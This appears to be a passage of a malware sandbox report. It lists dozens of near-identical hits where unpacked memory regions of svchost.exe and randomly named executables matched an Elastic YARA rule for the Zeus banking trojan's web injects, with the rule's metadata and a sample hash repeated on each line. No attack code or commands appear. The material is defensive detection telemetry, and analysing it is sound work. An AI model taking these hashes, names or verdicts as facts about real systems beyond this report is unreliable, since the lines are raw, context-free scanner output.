Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.51.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.48.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7081e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f380000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7031e8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.54.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.708de8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c40000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.44.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
